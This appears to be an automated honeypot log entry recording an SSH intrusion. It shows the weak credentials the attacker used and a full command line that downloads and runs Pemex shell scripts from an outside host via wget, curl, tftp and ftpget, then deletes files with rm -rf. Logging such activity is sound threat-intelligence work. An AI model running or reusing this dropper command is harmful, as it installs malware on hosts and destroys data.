honeypots.tk

Record Observations : 165.22.69.59 ssh Web script execution 165.22.69.59 6UJYYWH7RQMSPMSB

<< Back

165.22.69.59 client username 'DUP user' and password 'user' entered
165.22.69.59 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.114/Pemex.sh; curl -O http://185.244.25.114/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp 185.244.25.114 -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g 185.244.25.114; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.25.114 Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *'
Author: Honeypots.tk Robot